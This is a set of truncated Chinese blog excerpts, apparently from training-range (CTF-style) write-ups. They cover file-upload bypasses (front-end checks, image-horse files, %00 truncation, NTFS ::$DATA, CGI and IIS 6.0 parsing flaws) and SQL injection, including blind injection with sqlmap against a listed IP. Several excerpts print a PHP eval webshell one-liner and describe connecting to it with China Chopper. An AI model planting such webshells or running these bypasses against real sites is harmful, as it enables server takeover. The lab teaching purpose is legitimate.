第一关：前端验证绕过查看源码只允许上传.jpg|.png|.gif文件，前端验证可以用BP抓包来绕过，或者用插件关闭JS代码来绕过。新建一个一句话木马改成.jpg，然后上传抓包后缀改成.php，上传成功。第二关：Content-Type方式绕过这关是文件内容过滤，用图片马来绕过，首先做一个图片马，找一个文件小的图片，做图片马的图片越小越好，然后用创建一个TXT的一句话木马，在CMD命令生成：&nb

延时注入就是时间注入，是盲注的一种分类，根据返回时间的长短来判断是否存在注入。延时注入函数：sleep(n)将程序挂起或休眠，n为秒数。if(expr1,expr2,expr3) 判断语句，如果expr1为真则执行2，否则执行expr3。这里我也是用sqlmap来做，操作步骤和布尔盲注一样。判断是否存在注入点sqlmap.py -u "http://120.203.13.75:8150/

打开靶场，是SQL盲注注入。盲注使用条件是用之前的测试方法，服务器没有任何回显的情况。分为布尔盲注和时间盲注，布尔盲注会根据注入语句，返回ture或fals，布尔盲注的手工注入利用ascii值来逐个推算出表活字段的字符串的值，时间盲注，根据时间函数返回的时间长短来对应判断。布尔注入函数：length()返回字符串的长度；substr()截取字符串的个数；ascii()返回单个字符的ascii码值；

打开靶场，是SQL反弹注入，需要利用一个SQL数据库。根据老师建议的在香港云平台上搭建一个虚拟数据库服务器。用10分钟的匿名邮箱来注册账号，注册完成后，创建一个zhu数据库，在数据库里创建表。可以用select name frommaster.dbo.sysdatabases和dbo.sysobjects 来 查询系统库和表的内容。用insertinto opendatasource(）把当前

打开靶场，来到了文件上传的第十一关，查看源码：可以看到，对上传文件的后缀使用了白名单限制，图片路径是保存路径、随机数、时间戳和文件后缀拼接而成。先新建一个php的一句话木马<?php eval($_POST[zzz])?>，保存为11.jpg，然后上传抓包修改文件保存路径，放行，上传成功。在文件上传目录下看到是11.php文件，而不是.jpg图片，被%截断了，没有被执行。用菜刀连接：找

    出现CGI解析漏洞，实际上是php中的php.ini里面：cgi.fix_pathinfo=1,等于1即是开启，当访问ip下的/web目录/xx.jpg/1.php(1.php实际不存在，只会存在xx.jpg文件)导致xx.jpg以php文件形式执行。新建一个PHP一句话木马<?php eval($_POST[zzz])?>，保存为23.jpg文件，然后上传

打开靶场，提示输入ID参数，在URL后面输入参数？id=1来测试：http://120.203.13.75:8150/New/ErrorBased/RankOne/sql-one/?id=1显示正常，用id=1'测试： http://120.203.13.75:8150/New/ErrorBased/RankOne/sql-one/?id=1%27报错提示的数据库类型是MySQL

  这道题利用的是Windows下NTFS文件系统的一个特性，即NTFS文件系统的存储数据流的一个属性 $DATA。当我们访问a.asp::$DATA 时，就是请求 a.asp 本身的数据,当容器解析a.asp::$DATA 时会去掉后面的内容，解析a.asp文件。新建一句话木马18.php，用BurpSuite改包：在文件后面加上::$

靶场第二关是文件内容过滤，用图片马来绕过，首先做一个图片马，找一个文件小的图片。做图片马的图片越小越好，然后用创建一个TXT的一句话木马，在CMD命令生成：图片马生成了一个291.jpg图片，图片格式没有改变，然后选择291.jpg上传抓包，改成291.php。然后上传成功，图片显示出来。用菜刀连接图片马地址，就获得了flag.

IS6.0 有以下文件解析漏洞：    (1) 在文件夹为 asp, asa 内的所有文件都会被当成asp脚本进行解析.    (2) 文件名如：xxx.asp;yyy.jpg  的文件，会忽略分号后面的后缀，将该文件当成asp脚本进行解析.  &n